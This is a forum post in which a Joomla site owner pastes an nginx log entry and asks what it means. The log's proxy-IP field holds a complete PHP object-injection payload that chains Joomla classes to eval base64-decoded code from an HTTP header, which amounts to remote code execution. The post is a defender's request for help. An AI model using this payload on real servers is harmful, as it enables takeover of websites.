I am not certain what to make of this. At the very least Piwik should report the IP I think.
I am running a Joomla site using the php plugin to connect to Piwik and so this could be an attempt at hacking the webserver or covering tracks in Piwik. Can anybody tell me what this is and why Piwik sees the IP as null?
Two entries, the first listed below is to the http site a second with status 200 is to the https.
From nginx logs:
{ “@timestamp”: “2016-11-04T15:29:10+00:00”, “status”: “301”, “realip”: “82.221.139.25”, “proxyip”: “wwfop}__fvvlnefjcj|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:4:\x22\x5C0\x5C0\x5C0a\x22;O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:5:\x22cache\x22;b:1;s:19:\x22cache_name_function\x22;s:6:\x22assert\x22;s:10:\x22javascript\x22;i:9999;s:8:\x22feed_url\x22;s:69:\x22eval(base64_decode($_SERVER[‘HTTP_CMD’]));JFactory::getConfig();exit;\x22;}i:1;s:4:\x22init\x22;}}s:13:\x22\x5C0\x5C0\x5C0connection\x22;i:1;}\xF0\xFD\xFD\xFD”, “request”: “GET / HTTP/1.1”, “method”: “GET”, “referrer”: “http://****/”, “useragent”: “Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36”, “remote_user”: “-”, “contenttype”: “text/html; charset=utf-8”, “bytes”: “5”, “duration”: “0.047”,
Thanks for any help,
Bruce